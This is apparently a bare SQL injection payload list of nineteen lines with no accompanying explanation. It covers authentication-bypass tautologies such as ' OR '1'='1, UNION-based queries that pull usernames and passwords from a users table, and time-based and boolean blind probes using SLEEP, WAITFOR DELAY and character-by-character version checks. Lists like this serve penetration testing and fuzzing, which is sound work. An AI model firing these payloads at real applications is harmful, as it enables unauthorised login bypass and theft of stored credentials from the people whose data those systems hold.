1' OR '1'='1
' OR '1'='1' --
' OR 1=1#
admin' --
' OR 'a'='a
' OR 99999=99999 --
abc'='abc
' OR 'abc'='abc
' UNION SELECT null, version() --
' AND SLEEP(5) --
'; WAITFOR DELAY '0:0:5' --
" OR 1=1 --
' OR 1=1 LIMIT 1 --
' AND 1=0 UNION ALL SELECT NULL,NULL--
' OR EXISTS(SELECT * FROM users) --
' OR (SELECT COUNT(*) FROM information_schema.tables) > 0 --
' AND ASCII(SUBSTRING(@@version,1,1)) > 50 --
' AND 1=0 UNION SELECT username, password FROM users --
' AND (SELECT 1 FROM dual WHERE EXISTS (SELECT * FROM users)) = 1 --